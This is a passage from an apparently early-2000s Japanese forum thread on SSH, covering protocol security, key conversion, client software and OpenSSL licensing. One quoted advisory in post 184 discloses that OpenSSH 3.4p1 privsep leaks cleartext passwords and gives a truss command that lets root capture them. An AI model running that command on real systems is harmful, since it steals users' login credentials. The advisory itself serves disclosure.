CRC なんていい加減な方法ではなくちゃんとした MAC を用いているの
で、CORE SDI の insertioin attack に類似した型の攻撃が成立する
ことはほぼ不可能になってる (これ実は SSH1 でも成立しない筈なん
だけど)。


141 :名無しさん@XEmacs (=140):02/08/26 14:16
>>140
> MITM に関しては SSH1 も SSH2 も等価。最初の一発はどっちもごまか
> される可能性があるし、二回目以降はユーザ認証に公開鍵暗号を使っ
> ていれば検出可能 (ただし、PKI に対応している商用版を持って来る
> とまた話は別だが)。

スマソ。この部分、嘘だった。正しくは

< MITM に関しては SSH1 も SSH2 も等価。ユーザ認証に公開鍵暗号を使っ
< ていれば一発目から検出可能。

だな。PKI 云々もあんま関係なかった。

142 :138:02/08/26 18:25
ぐぐってみたらここの過去ログが出てきたよ〜 回線切って...
の前にスレの202あたりが結論って事でいいんでしょうか



143 :名無しさん@お腹いっぱい。:02/08/26 21:31
> SSH1 Protocol に対して SSH2 Protocol の利点ってなんでしょうか?

mitm 以外にも、DH 鍵交換を使っているので、より安全。
と、されている。

144 :名無しさん@お腹いっぱい。:02/08/27 10:54
>>142
> ぐぐってみたらここの過去ログが出てきたよ〜 回線切って...
> の前にスレの202あたりが結論って事でいいんでしょうか

どれどれ、見てみよう…。って、なるほど、この辺りが『SSH1 じゃダ
メだけど SSH2 なら MITM に対抗できる』という誤認識が普及した始
まりなわけね。

で、さらにそっから孫引用されている記事

http://sysadmin.oreilly.com/news/silverman_1200.html

も読んでみると、、、おい、この記事書いたの snail book の著者じゃ
ねーか。何考えてんだか。自分の本の記述と矛盾してるやん。

 In both SSH-1 and SSH-2, the key exchange is so designed
 that if she does this, the session identifiers for each
 side will be diferent.

Snail book (SSH The Secure Shell The Definitive Guide) p102 よ
り。“diferent”というスペルミスは原文ママ。引用文中の“this”っ
てのが MITM のこと。

で、正解は snail book の記述の方ね。

つーこって、誰が書いたものだろーとウェブ上の解説なんぞを信じる
とイタい目に逢うという新たな実例なんだ罠。

RTFS。


145 :名無しさん@お腹いっぱい。:02/08/27 13:00
やっぱり夏はカレーだよね。


146 :名無しさん@お腹いっぱい。:02/08/27 21:07
夏カレー
乙カレー
うな重

147 :名無しさん@お腹いっぱい。:02/08/28 08:47
ユーザ sshd ってなんに使うんでしょう?
FreeBSD-stable 上の openssh 3.4p1 ですが、
ps をとっても見当たらないし。

# FreeBSD 質問スレの方がよかったかな


148 :何度もガイシュツ:02/08/28 09:27
>>147
http://www.unixuser.org/~haruyama/security/openssh/README.privsep_nihongo.txt

149 :147:02/08/28 11:28
ありがと & ガイシュツすまそ。
認証時に一時的に使われるんですね。ps とって確認しました。

150 :名無しさん@お腹いっぱい。:02/08/29 21:21
authorized_keys の中にめちゃくちゃ鍵がたまってきてます。
もう使わないホストの公開鍵もあるはずなんですが、
どれがどれやら…

それぞれの鍵がいつ最後に使われたかを記録してくれるといいんですけどね。
みなさん、authorized_keys は太りすぎていませんか?

151 :名無しさん@お腹いっぱい。:02/08/29 21:39
known_hostsじゃないの?
authorized_keys は使いまわすので1つか2つしか入れてないが…


152 :名無しさん@お腹いっぱい。:02/08/29 22:07
>>151 いや、各ホストですべて異なる鍵を ssh-keygen してるもんだから…
そうか、普通は異なるホストで全部異なる鍵ペアを作ったりしないのか… 鬱死

ところで、ssh-keygen で OpenSSH の鍵ファイル→ SSH2 の鍵ファイル ってできます?
-i オプションで SSH2 → OpenSSH はできるみたいなんだけど。
OpenSSH 3.4p1 を Debian GNU/Linux と cygwin で使用中。

153 :名無しさん@お腹いっぱい。:02/08/29 22:31
>>152
いや、ホストごとに ssh-keygen するもんでない?
キーのコメント (メールアドレス) で区別できない?

154 :名無しさん@お腹いっぱい。:02/09/01 02:04
すみません、かなりDQNな質問はこちらでは可能でしょうか?
まだ自分でサーバーを立て始めて勉強している最中なのですが、
sshでリモートからpublic key認証でログインしようとすると、

"No further authentication methods available."
No more authentication methods available.

と言われ、ログインできません。
使っているクライアントはSSH Secure Shell Client3.2.0.0(ちと古いですが)
サーバーにはopenssh-3.1p1-3(RedHat7.3上にて)なのですが。

色々調べてみたのですが、クライアントでジェネレートしたpublic keyを
サーバー上のhome/****/.sshにアップして、
ssh-keygen -i -f ******.dsa.pub >> authorized_keys2でコンバート
しろ、という方法がSSHのFAQに出ていたので試してみたのですが、
さっぱりダメでした。
何がいけない点なのかが、全くわかりません。。。
ものすごい厨房な質問で申し訳ないのですが、どなたか、ヒントを下さい。。。

155 :名無しさん@お腹いっぱい。:02/09/01 02:26
> ところで、ssh-keygen で OpenSSH の鍵ファイル→ SSH2 の鍵ファイル ってできます?

できます。
ssh-keygen -i -f ssh_com_pubkey → openssh_pubkey
ssh-keygen -e -f openssh_pubkey → ssh_com_pubkey

> さっぱりダメでした。
> 何がいけない点なのかが、全くわかりません。。。

こっちも同感です。それだけの情報じゃね。


156 :名無しさん@お腹いっぱい。:02/09/03 13:20
>>155 ありがとうございます。 -e オプションですか。
SECSH Public Key File Format に変換すればよかったんですね。

157 :名無しさん@お腹いっぱい。:02/09/03 13:21
>>154 サーバ (sshd) のログを見てみると解決するかもしれませんよ。
あと、クライアント (ssh) で -v オプションを付けてみるというのはどうでしょうか?

158 :名無しさん@お腹いっぱい。:02/09/05 02:08
>>154
そのバージョンってauthorized_keys2の2は必要?

159 :154ではないが:02/09/05 15:15
>>158
2.9.9より新しいバージョンなんでobsoleteではあるが、互換性を考慮して
「authorized_keys*2*でも可能」ということになっていると思うが、どうかな?

そのあたりの事情に詳しい人のフォローきぼん

160 :名無しさん@XEmacs (=141):02/09/06 10:50
>>157
> あと、クライアント (ssh) で -v オプションを付けてみるというのはどうでしょうか?

>>154 によるとクライアントは ssh.com 版らしいので、ssh -d 3 く
らいかな。

んで、まさかクライアント側で ~/.ssh2/identification を作ってい
ない、とかいうオチではないよね?


161 :名無しさん@XEmacs:02/09/06 16:44
>>159
> 2.9.9より新しいバージョンなんでobsoleteではあるが、互換性を考慮して
> 「authorized_keys*2*でも可能」ということになっていると思うが、どうかな?
>
> そのあたりの事情に詳しい人のフォローきぼん

正確には『より新しい』じゃなく『以降の』バージョンでは、って
ことになるが、それ以外はその通り。

この辺りの措置は user_key_allowed という関数で行なわれるんだけ
ど、この関数、2.9.9 〜 3.4p1 では、まず authorized_keys を試し、
それでうまく行かなかったら authorized_keys2 を試すようになって
いるようだ。


162 :159:02/09/06 20:37
>>161
> 正確には『より新しい』じゃなく『以降の』バージョンでは、って
> ことになるが、

おっとっと、たしかにそうですね。

> この辺りの措置は user_key_allowed という関数で行なわれるんだけ
> [...]

なるほど、参考になりますた。んじゃ、それを元にソースのdiffをとったり
してみるYO!! Thanks!!

163 :名無しさん@お腹いっぱい。:02/09/11 00:37
厨な質問ですみません。
パスフレーズを使用せずに、パスワードで認証を行う場合でも
そのパスワードは暗号化されているのですか?


164 :名無しさん@お腹いっぱい。:02/09/11 00:49
RTFAQ

165 :名無しさん@お腹いっぱい。:02/09/11 01:23
↑つまんねーよ。


166 :名無しさん@お腹いっぱい。:02/09/11 06:38
>>163
もう何度も出てきた質問でうんざり。ssh接続が確立した
時点で暗号化はされているので、パスワードも暗号化され
ている。

167 :名無しさん@お腹いっぱい。:02/09/13 07:58
>>166 おそらくその「ssh接続が確立した時点」というのが正確に理解されていない場合が多いと思われ。
「認証が通った時点」と勘違いしている人もいるんだよね。

168 :名無しさん@お腹いっぱい。:02/09/13 08:10
>「ssh接続が確立した時点」
>「認証が通った時点」
だっからどう違うの。おせえて、おせえて、おせえて


169 :名無しさん@お腹いっぱい。:02/09/13 08:20
ssh -vして何が起きているのか眺めてください

170 :名無しさん@お腹いっぱい。:02/09/13 08:58
sniff してみりゃいいじゃん。

171 :名無しさん@お腹いっぱい。:02/09/13 09:00
>>168 TCP コネクション確立直後に、ホスト(サーバ)とクライアントの間で、ホスト鍵(各 sshd に固有の鍵、通常は sshd をインストールした時点で生成されて、それ以後は変更されることはない)の確認をする。
これによってホストがいつの間にか別のマシンにすりかえられていたりした場合に検出できる。
もしホスト鍵が以前そのホストに接続した時のものと異なっていたときには、警告される。

この時点で、以降のデータのやり取りを暗号化するための共通鍵が交換される。以降のデータのやり取りは、すべて暗号化される。いわゆる公開鍵暗号+共通鍵暗号ハイブリッド方式。

いくつかある認証を試すのは、これ以降の話。たとえば「ユーザ名+パスワード」による認証の際のデータも、すべて暗号化される。なので、安心。


172 :名無しさん@お腹いっぱい。:02/09/13 09:02
>>171 なので、
「ssh接続が確立した時点」=通信路を共通鍵暗号で暗号化するために必要な鍵の交換が終わった時点
「認証が通った時点」=文字通り、認証にパスして、フォワーディングなどのセットアップが終わった時点

173 :名無しさん@お腹いっぱい。:02/09/13 09:06
ちょっと古いけど、これ読め。
http://www.itojun.org/paper/wide-9811-ssh-tutorial/

174 :168:02/09/13 09:23
>>169 - 173
みなさんご親切にありがとうございまひた
さよか、わてはまだ鍵の交換ができてないのに
認証を焦ってまひた
がんばりまふ


175 :名無しさん@お腹いっぱい。:02/09/13 09:27
>>173 をいとぢゅん氏のか

176 :名無しさん@お腹いっぱい。:02/09/14 18:41
ログイン時 .bashrcで、fortune等を実行していると,scpが利用できなくなります。
なんとかfortuneを実行させたいのですが、
シェルスクリプト等でscpによるセッションを判定できる方法ってありますか?

177 :名無しさん@お腹いっぱい。:02/09/14 19:05
.bash_profile
.bash_login
.profile

178 :名無しさん@お腹いっぱい。:02/09/14 19:40
>>177
cygwinスレに詳しく書いてあったので .bash_profileから実行してみました
そうすると、ログイン時しか表示されなくなります。
ktermなどの端末を開いた時すべてで表示させたいんです。

179 :名無しさん@お腹いっぱい。:02/09/14 19:42
あ、全ての端末でログインオプションをつけりゃいいのか。

180 :名無しさん@お腹いっぱい。:02/09/15 14:41
$PS1とか$BASHとか。
あるいは、ttyを持っているかどうか、という基準で
if tty >/dev/null 2>&1
という手もあるかも知れない。

181 :名無しさん@お腹いっぱい。:02/09/15 14:44
環境変数 SSH_TTY を確認すべし。

182 :名無しさん@お腹いっぱい。:02/09/18 18:51
SSH のポートフォワーディングで、 Windows のファイル共有のためのトラフィック通せませんかね?
つまり NetBIOS over TCP/IP を通したいってことなんですが…
素直に PPTP とかで VPN 張れってのは、無しの方向で。

183 :名無しさん@お腹いっぱい。:02/09/18 21:18
WebDAV にしとけ ってこれも余り好ましくないけどな

184 :http://www.securiteam.com:02/09/18 22:08
こんなの来たんだけど (((;゚Д゚)))ガクガクブルブル???

OpenSSH 3.4p1 Allows Revealing of Password (Privsep Feature)
------------------------------------------------------------------------
SUMMARY

During authentication, OpenSSH 3.4p1 with privsep enabled passes the
cleartext password from the main process to the privsep child using a
pipe. Using strace or truss, root can see the user's plaintext password
flying by. Andrew observed this behavior from OpenSSH 3.4p1 built using
GCC on Solaris 2.8 and the current Debian OpenSSH 3.4p1 package.

DETAILS

The level of effort to determine clear text passwords, for even the most
inexperienced UNIX administrator, is almost zero given the above. Andrew
realizes that no matter how you slice it, it will be possible for root to
grab the password from wherever it is stored in memory. Alternatively,
recompile SSHd to log the password, or any number of other ways. However,
the methods Andrew just mentioned all require someone with significantly
more know how than:
truss -fp `cat /var/run/sshd.pid`

Vendor response:
Theo and Markus told Andrew that this is not an issue. Theo says that you
cannot prevent root from determining a user's password. Andrew does not
disagree but asked why OpenBSD bothers to encrypt user passwords at all if
that is his attitude.

185 :名無しさん@お腹いっぱい。:02/09/18 22:25
ここが笑えますね。

ベンダの反応:
> Theo (de raadt) と Markus (Friedl) は発見者 Andrew に対し、これは問題にはならないと
> 伝えた。Theo いわく、root がユーザのパスワードを見るのを防ぐことはできないからだという。
> Andrew はこれを否定しなかったが、それならなぜ OpenBSD はユーザのパスワードを
> わざわざ暗号化しているのかとたずねた。


186 :名無しさん@お腹いっぱい。:02/09/18 22:56
OpenSSHが偽物に摩り替えられていた事件で、相当に信頼が揺らいだ
気がする。

187 :名無しさん@お腹いっぱい。:02/09/18 22:58
のっとられても絶対にファイルのすり替えをできない
ようなFTPサーバーを作ることは可能だと思うが、
どうだろうか?READONLYのファイルシステムあるいはライト
プロテクトのあるメディアにOSとかFTP用のファイルを置き、
ログは別のマシンに転送するという具合にやれば、
のっとられても、何もできないはずだが。。。

188 :名無しさん@お腹いっぱい。:02/09/18 23:00
>>182 できます。


189 :名無しさん@お腹いっぱい。:02/09/18 23:29
>>187
リモートで管理する限り不可能。

190 :名無しさん@お腹いっぱい。:02/09/19 00:13
>>187
鋼鉄なんとかってやつでそういうのやってるよね


191 :名無しさん@お腹いっぱい。:02/09/19 00:15
truss するだけなんて、あまりに簡単過ぎ。

main process が privsep child を fork する前に、あらかじめ共有鍵を
つくっておき、通信路をその共有鍵で暗号化するだけで解決するのに、
なんで問題じゃないとかいって見ないふりするんだろ?


192 :http://www.securiteam.com:02/09/19 01:18
Web掲載されたのでage
http://www.securiteam.com/unixfocus/5VP0H2A8AK.html

193 :名無しさん@お腹いっぱい。:02/09/19 01:37

   ま   た   テ   オ   で   ラ   ア   ア  づ   か



194 :名無しさん@お腹いっぱい。:02/09/19 02:14
>>191
rootなんだから、kmemでもなんでも見れるから、ってことじゃないの?
というかrootがその気になればsshd入れかえることだってできるんだし、
見ようと思ったらいつでも見れるでしょう。

でもまぁ確かに、お手軽ではあるけどね。


195 :名無しさん@お腹いっぱい。:02/09/19 02:23
>>194
乗っ取られた時点で負けというのは確かなんだが、それでもパスワード収集
までに時間と手間を掛けさせるのは、セキュリティ面では意味があると思うな。

そファイル入れ替えは tripwire なんかでトラップが張ってあれば検出できる
可能性もあるしさ。

196 :名無しさん@お腹いっぱい。:02/09/19 02:31
Theoのあのガキっぽさはなかなか気に入ってるんだけどな。

197 :名無しさん@お腹いっぱい。:02/09/19 10:50
>>194

もちろんその通りだし、心底悪意のある root に対しては、
RSAAuthenticationのような手段をとらない限り、普通は
対抗しようがない。
じゃ直さなくてもまったく問題がないかというと、そうでもなくて
・侵入者に対抗するするため、実行可能なファイルを置いた
 パーティションは全て read only mount し、侵入者が
 侵入用コマンドを実行できないようにした状態でも、
 システムにあらかじめインストールされているコマンドだけ
 を使って、ごく簡単に password を盗める
・悪意のある侵入者ではなく正規の管理者が、ちょっとした
 できごころを起こした場合にも危険
といったことを考えると、やはり問題だろ。

> Theoのあのガキっぽさはなかなか気に入ってるんだけどな。

俺はガキに自分の身の安全を委ねたくはないんだけどなー。
現状では OpenSSH 以外に選択肢がないのがなんとも。


198 :名無しさん@お腹いっぱい。:02/09/19 22:13
> 俺はガキに自分の身の安全を委ねたくはないんだけどなー。

とはいっても、実際には現代人の日常生活の大部分は
何らかのかたちでドキュソに支えられてるわけでさ。


199 :初期不良:02/09/21 13:43
>>198
そう言うのが嫌な人はこっち使えばいいんじゃないの?
http://www.ssh.com/

200 :名無しさん@お腹いっぱい。:02/09/21 15:01
?ttp://cr.yp.to/djbssh.html


201 :名無しさん@お腹いっぱい。:02/09/21 16:15
>>199-200
どっちもライセンスの問題で安心して使えない罠

202 :名無しさん@お腹いっぱい。:02/09/21 16:47
>>200 みえない…

203 :名無しさん:02/09/21 19:26
>>202
だってないもん。

204 :名無しさん@お腹いっぱい。:02/09/21 19:29
>>203 (T_T)

205 :名無しさん@お腹いっぱい。:02/09/21 20:21
>>202
djb 厨には見えてるらしい

206 :名無しさん@お腹いっぱい。:02/09/21 22:49
「サンがOpenSSLプロジェクトに暗号化技術を提供」
http://japan.cnet.com/Enterprise/News/2002/Item/020920-3.html

これって使用もfreeなのかな?
だったらsshでも、鍵交換にECDHアルゴリズムを使ったり、
/etc/ssh/ssh_host_ecdsa_key なんてファイルができてたり
するようになるのかな。

207 :名無しさん@お腹いっぱい。:02/09/22 20:17
ttp://www.ayera.com/teraterm/
TeraTerm Pro Web 3.1.1 - Enhanced Telnet/SSH2 Client
キター

208 :名無しさん@Emacs:02/09/22 20:19
>>207
マルチうざ


209 :名無しさん@お腹いっぱい。:02/09/22 20:34
>>207
やったー。情報ありがとう。
>>208
マルチでいいのと悪いのと区別しろYo


210 :名無しさん@お腹いっぱい。:02/09/22 20:37
>>207
ttp://www.ayera.com/teraterm/ttermpro_311.zip
ダウソできませんが、何か?

211 :!208:02/09/22 20:40
>>209
うぜぇのはうぜえよ。

212 :名無しさん@お腹いっぱい。:02/09/22 21:00
>207=209
分かり易すぎ

213 :207:02/09/22 21:01
>>209
support@ayera.comに掛け合ってみますー。
ということでメール出してみました。

214 :名無しさん@お腹いっぱい。:02/09/22 21:23
ダウソできない。

215 :名無しさん@お腹いっぱい。:02/09/22 21:28
>>212
ちがわい。>>209はただtsshの糞ユーザに過ぎんがな、
一回SSH2のサーバ作ってつながらなくて苦労した馬鹿だ。>漏れのこと
漏れの他にも感動してる奴に>>210なんてのもいるじゃん。
>>207は大人だ。


216 :名無しさん@お腹いっぱい。:02/09/22 21:54
>tssh
( ´,_ゝ`)プッ

217 :名無しさん@お腹いっぱい。:02/09/22 21:59
tssh って何!?

218 :名無しさん@お腹いっぱい。:02/09/22 22:03
>>216, >>217
tsshってttsshのことです。手が滑ったのが
分からないお前らはアフォですか。


219 :!216 && !217:02/09/22 22:11
Tera Term SSHってttsshって略すのか。漏れ、tcshかと思ったよ…。


220 :名無しさん@お腹いっぱい。:02/09/22 22:24
略でなくて、TTSSH が正式名でなかったっけ?

221 :名無しさん@お腹いっぱい。:02/09/22 22:29
でもなぁ、もう PuTTY に慣れちゃったし、いまさら感が否めないなぁ。

222 :名無しさん@お腹いっぱい。:02/09/22 22:33
まだPuTTYに手を出したばっかりの漏れには朗報ナリ。
一応期待。

223 :名無しさん@お腹いっぱい。:02/09/22 22:54
今さらteratermのダッサイインターフェースなんかに戻れない

224 :名無しさん@お腹いっぱい。:02/09/23 00:03
今さらWindowsのダッサイインターフェースなんかに戻れない

225 :名無しさん@お腹いっぱい。:02/09/23 00:19
今さらcommand.comのダッサイインターフェイスなんかに戻れない

226 :名無しさん@お腹いっぱい。:02/09/23 00:25
>>225
まぁ少なくともbashやtcshに比べたら遥かにダサイわな。

227 :名無しさん@お腹いっぱい。:02/09/23 00:35
>>225
cmd.exe っていうのがかなりイイらしいよ

228 :名無しさん@お腹いっぱい。:02/09/23 00:51
>227
50歩100歩
どんぐりの背比べ

229 :名無しさん@お腹いっぱい。:02/09/23 00:56
>>227
それより ssh ってのがかなりオススメ

230 :名無しさん@お腹いっぱい。:02/09/23 05:22
>>207
現在も>>210と同様、ダウンロードできないのだが…、ダウンロードできた人いる?
いたら使用した感想などをキボンヌ

231 :ダウソage:02/09/23 17:48
>>230
ダウソできたよ!

TTSSH組み込んだ感じとほぼ同じ。SSH Forwardが無い。
謎のHTTPサーバ機能が付いてる。

232 :名無しさん@お腹いっぱい。:02/09/23 18:55
>>231
ssh でつないで、ls -l ~/ とかやると、
[ENTER] を何度か打たないとリスト全部を表示できない。
バッファリングまわりが変なのかなぁ?

233 :207:02/09/23 19:28
>>213
CEOから謝罪メールが返信されてきますた。
かなり吃驚。


234 :名無しさん@Emacs:02/09/23 19:31
>>232
もしかして使えない?


235 :名無しさん@お腹いっぱい。:02/09/23 19:42
>>234
こんなんなるの俺だけなのかなぁ?ほかのひとは大丈夫なの?
サーバ側は、FreeBSD 4.5 の OpenSSH 3.4p1 で、特別な設定は特になし。
クライアントは、SSH 関係の設定はデフォルトのまま、圧縮とかもなし。

236 :231:02/09/23 19:50
>>232
家も同じく。

WinXPにコレと、相手はVine2.1にOpenSSH 3.4p1
圧縮は無し。


237 :名無しさん@お腹いっぱい。:02/09/23 20:35
>232
うちでも同じ。
接続先は Solaris 8 + OpenSSH 3.4p1

あと、EUC が使えないことに気づいたんで、
もう削除しちゃいました。
SJISなら一応表示はできてたけど。

238 :235:02/09/23 20:41
>>237
WinXP ですが、うちでは Setup のデフォルトの SJIS を EUC にして EUC 使えたよ。

239 :名無しさん@お腹いっぱい。:02/09/23 21:12
確かに表示が変だね。


240 :名無しさん@お腹いっぱい。:02/09/23 21:13
公開鍵認証には対応していないのかな?

241 :初期不良:02/09/23 21:20
>>240
うーむ、公開鍵認証オンリーにしてるから接続すらできん...

242 :231:02/09/23 21:26
表示変だね。バッファに入ってるものが詰まって出る
みたいな感じ。文字化けとかは無くって、EUCで問題ないよ

screen使ってmew@emacsとか使うと画面切り替わりの際の
^Lは必須。この点だけでも直してくれないかなあ。

243 :名無しさん@お腹いっぱい。:02/09/23 21:54
てか、わざわざ TeraTerm 上に載せる意味なんかあるの?

244 :名無しさん@お腹いっぱい。:02/09/23 21:57
基本的な機能は TeraTerm のを利用するから 0から作るようりは簡単とかじゃない?

245 :名無しさん@お腹いっぱい。:02/09/23 22:00
LAN 上の Windows から普通に接続してもこんなのが記録されるね。

Did not receive identification string from 192.168.0.3


246 :名無しさん@お腹いっぱい。:02/09/23 22:01
>>243
シリアルコンソールも telnet も SSH も SSH2 も
みんな同じソフト上でできるならそれに越したことないんじゃない?

247 :名無しさん@お腹いっぱい。:02/09/23 22:19
>246
PuTTYも全部できるが?

248 :246:02/09/23 22:21
ごめん、微妙に嘘ついた。シリアルは出来ないね。
でも全部詰め込むメリットって何?

249 :名無しさん@お腹いっぱい。:02/09/23 22:26
1つあれば用が足りる。

250 :名無しさん@お腹いっぱい。:02/09/23 23:16
Tera Term に慣れてるから、とか。
なぜそんなに詰めこむのを嫌うの?

251 :名無しさん@お腹いっぱい。:02/09/23 23:39
djb信者のかほり〜

252 :名無しさん@お腹いっぱい。:02/09/24 01:15
toolbox approach ?

253 :名無しさん@お腹いっぱい。:02/09/26 00:35
TeraTerm Pro Web 3.1.2 - Enhanced Telnet/SSH2 Client 
となっているんで試したのですが、皆さん^H^H^Hお前らと同じ状況ですね。
バッファリングが変。
[Setup]-[Recurring Command]ってなに?
3.1.1 の頃からあるのでしょうか?

254 :i6245:02/09/26 01:09
俺 TeraTermPro + ttssh 使ってるなぁ。
Macro 結構組んでるから今更違うのに変えるのも面倒だ。。
そういえばなんで PuTTY 使わなかったんだろう。
良く覚えてないや。。

WinSCPは使ってるけど。。


255 :名無しさん@お腹いっぱい。:02/09/26 13:03
>>240

Win2000 で putty の pagent を常駐させているのだが、そっから勝手に鍵データとってきて、公開鍵認証やるみたい。
ユーザ名を指定するだけで、パスワード無しで接続されてしまった。


256 :名無しさん@お腹いっぱい:02/09/26 17:41
いきなりですみません、WinSCPで質問なのですが・・・。
実は以下のことで確認をしたいので、どなたか親切な方、
教えてやって下さい。

とあるファイル「TEST.TXT」に対して、グループを設定しました。
そのグループに仮にですがAとBというユーザーが含まれています。
TEST.TXTのOWNERは、ユーザーAになっています。
ファイルのパーミッションは、664です。

そこでユーザーBが、サーバー側にあるTEST.TXTと同名のファイルを
ローカルからサーバーへアップロードをさせようとすると
「OPERATION NOT DENIED」と表示されてしまい、上書きの
アップロードをすることができません。
WinSCPでは、OWNERが違うとグループが同じでパーミッションでも許可して
いてもファイルのOWNERと違うユーザーは上書きアップロードをすることが
できないのでしょうか。

よければ教えてください。
どうも失礼しました


257 :名無しさん@お腹いっぱい。:02/09/26 17:45
>>256
そのファイルがあるディレクトリの
owner と permission はどうよ。

258 :名無しさん@お腹いっぱい。:02/09/26 18:19
がいしゅつかもしれませんが

ssh2 のログイン情報等は /var/log/messages に出力されていると思いますが
ssh2関連の情報だけを、別のログファイルへ (ex: /var/log/ssh2_log etc...) 出力する事は可能なのでしょうか?



259 :名無しさん@お腹いっぱい。:02/09/26 18:26
>>>258 /etc/syslog.conf

260 :名無しさん@お腹いっぱい。:02/09/26 18:34
>>259

はい、/etc/syslog.conf に

# ssh2d login
*.sshd2 /var/log/sshd.log

に、記述し、syslogdにHUPをかけたのですが、うまく sshd.logには、出力されないのです。

記述の仕方が間違っているのでしょうか?

261 :名無しさん@お腹いっぱい。:02/09/26 18:41
>>260 はい。


262 :名無しさん@お腹いっぱい:02/09/26 18:41
>>257
ファイルが入っているディレクトリのグループは、ファイルと一緒ですが、
OWNERはAでもBでもないまた別のアカウントです。
これではいけないでしょうか。

263 :名無しさん@お腹いっぱい。:02/09/26 18:42
>>260
OS は何?

264 :260:02/09/26 19:39
>>261
正しい記述の方法をご教授頂けますと深甚です。

>>263
RedHat Linux 6.2 です。

265 :名無しさん@お腹いっぱい。:02/09/26 19:45
>>264
OpenSSHに変えて、sshd -e 2> LOGFILE で解決しる

266 :名無しさん@お腹いっぱい。:02/09/26 20:06
>>264
なぜ man を調べようとしない?

267 :名無しさん@お腹いっぱい。:02/09/26 23:13
>256
logging を on にして、詳細をみてみるとか

268 :名無しさん@お腹いっぱい。:02/09/27 10:37
>>155 のやり方で OpenSSH で生成した SSH2プロトコル用の鍵(公開鍵および秘密鍵、念のためDSA および RSA どっちも)を SSH Communications Security Corp の SSH Secure Shell で使うべく変換しました。
で SSH Secure Shell からインポートしたら確かにインポートされました。
鍵一覧表示には 「1024-bit DSA, converted from OpenSSH by ore@orenohost」 と表示されています。
が、これを使って認証ができません。また、秘密鍵のパスフレーズの変更もできないようです。
もちろん SSH Secure Shell 自身で作った鍵なら認証もパスフレーズの変更もできます。
やはり OpenSSH と SSH Secure Shell の間での鍵の共有はできないのでしょうか?

OpenSSH は Cygwin 上のものと Debian GNU/Linux のものを試してみました。

269 :名無しさん@お腹いっぱい。:02/09/27 10:39
ところで SSH の呼称ですが、
プロトコル自体を表す場合は SecSH
SSH Communications Security 社のクライアントを表す場合は SSH Secure Shell
オープンソースのクライアントを表す場合は OpenSSH
ということでいいんでしょうか?

270 :名無しさん@お腹いっぱい。:02/09/27 10:48
>>269
> オープンソースのクライアントを表す場合は OpenSSH
OpenSSH はサーバも含むし、
OpenSSH 以外にも open source の SSH ソフトウェアはある。

271 :名無しさん@お腹いっぱい。:02/09/27 10:52
>>270
そ、そですね。じぶんも OpenSSH の sshd 使ってながら…
PuTTY などもソースコード公開されてますしね。

272 :268:02/09/27 12:30
なんか勘違いしていたようです。
秘密鍵は変換できないんですね。

ssh-keygen -e -f id_dsa

の出力を良く見ると

---- BEGIN SSH2 PUBLIC KEY ----

で始まってる・・・異なるクライアントなんだから、秘密鍵は作り直せってことですね。

273 :名無しさん@お腹いっぱい。:02/09/27 12:58
さらばOpenSSLなのか。。。

OpenBSDって、やること極端ね


274 :名無しさん@お腹いっぱい。:02/09/27 13:12
TheoSSL の発表はいつですか(w

275 :名無しさん@お腹いっぱい。:02/09/27 13:14
>>273
どういうこと?

276 :名無しさん@お腹いっぱい。:02/09/27 13:54
OpenSSH 3.5 がそろそろ出るよn.

277 :名無しさん@お腹いっぱい。:02/09/27 15:15
>>275
http://marc.theaimsgroup.com/?l=openbsd-misc&m=103280816316720&w=2


278 :名無しさん@お腹いっぱい。:02/09/27 15:46
>>277
フリーを保つという姿勢は立派だが、最後の二行で喧嘩売りすぎ。Theo 節が
冴え渡っとるな。

279 :名無しさん@お腹いっぱい。:02/09/27 15:49
いやぁ、まぁ潔癖をつらぬくためにはソレくらいの喧嘩腰でないとだめかも試練。
俺的には、消して極端とは思えない。

潔癖症といえば、 Debian も潔癖症だね。

280 :名無しさん@お腹いっぱい。:02/09/27 15:49
>>279 ごめん、誤字多すぎた。

281 :名無しさん@お腹いっぱい。:02/09/27 15:53
>>277
> the licence on the new code basically builds a contract that says "if
> you use this code, you cannot sue Sun".
このライセンスの原文ってどこにあるの?

訴訟を起こせないといっても要するにBSD ライセンスや MIT ライセンスの
責任放棄の表明と変わらんような気もするんだが。(THIS SOFTWARE IS
PROVIDED "AS IS" ... 以下ね)

282 :名無しさん@お腹いっぱい。:02/09/27 16:03
Debian の ML でも出た話題。
http://lists.debian.org/debian-legal/2002/debian-legal-200209/msg00183.html
結論、non-free になる。

Debian は徹底した「フリー」主義だからなぁ。
Scial Contract (憲章?) http://www.debian.org/social_contract
What Does Free Mean? http://www.debian.org/intro/free

ライセンスの問題とは関係ないけど、 CNET の記事。
http://msnbc-cnet.com.com/2100-1001-958679.html?type=pt&part=msnbc&tag=alert&form=feed&subj=cnetnews


283 :281:02/09/27 16:04
これか。
http://marc.theaimsgroup.com/?l=cryptography&m=103253111420211&w=2

284 :名無しさん@お腹いっぱい。:02/09/27 16:12
>>282
non-free だからといってメンテされないわけではない。
モノによるが。

参考: BOF 報告
http://pc.2ch.net/test/read.cgi/linux/1030178687/764
http://pc.2ch.net/test/read.cgi/linux/1030178687/808

285 :281:02/09/27 16:15
>>283
確かに ECC のコードに関しては、従来の OpenSSL のライセンスよりもかなり
キツいね。

ただ、そのライセンスは ECC 使う場合にのみ関係してくる話で OpenSSL の内、
OpenSSH が利用している部分には無関係だから、神経質になる必要はないと
思うけどな。GPL と違って「混ぜるな危険」という性質のライセンスでもないし。

もちろん Debian が OpenSSL を non-free と分類するのは正しいし、それは
一貫性のある見識。でも BSD ライセンスを採用している OpenBSD でそこに
拘るのは違うような気がする。

286 :名無しさん@お腹いっぱい。:02/09/27 20:00
>>269
>ところで SSH の呼称ですが、
>プロトコル自体を表す場合は SecSH

「セクーシュ」?


287 :名無しさん@お腹いっぱい。:02/09/27 22:35
>>286
そのつづりで長音が入るとは、どこの訛りだ?

288 :名無しさん@お腹いっぱい。:02/09/27 22:43
2ちゃんねる

289 :名無しさん@お腹いっぱい。:02/09/27 23:05
●っ●●→●●ー●のパターンですな
マタ-リ
セク-ス
などなど


290 :名無しさん@お腹いっぱい。:02/09/28 00:03
●●ー●ニヤリ

291 :名無しさん@お腹いっぱい。:02/09/28 00:30
http://cr.yp.to/djbssh.html
もうすぐ



出してくれないかなぁ・・・

292 :名無しさん@お腹いっぱい。:02/09/28 01:24
djbがSSHなどという複雑怪奇なプロトコルを実装するとはとても思えない。
やるとしたらまったく別の、もっと単純なプロトコルで、
暗号化と認証とインタフェイスをべつべつのプログラムに分けるだろう。
そしてたぶん最初は windows クライアントがなくて、使えねー、ということに
なると思う。まあやんないと思うけど。

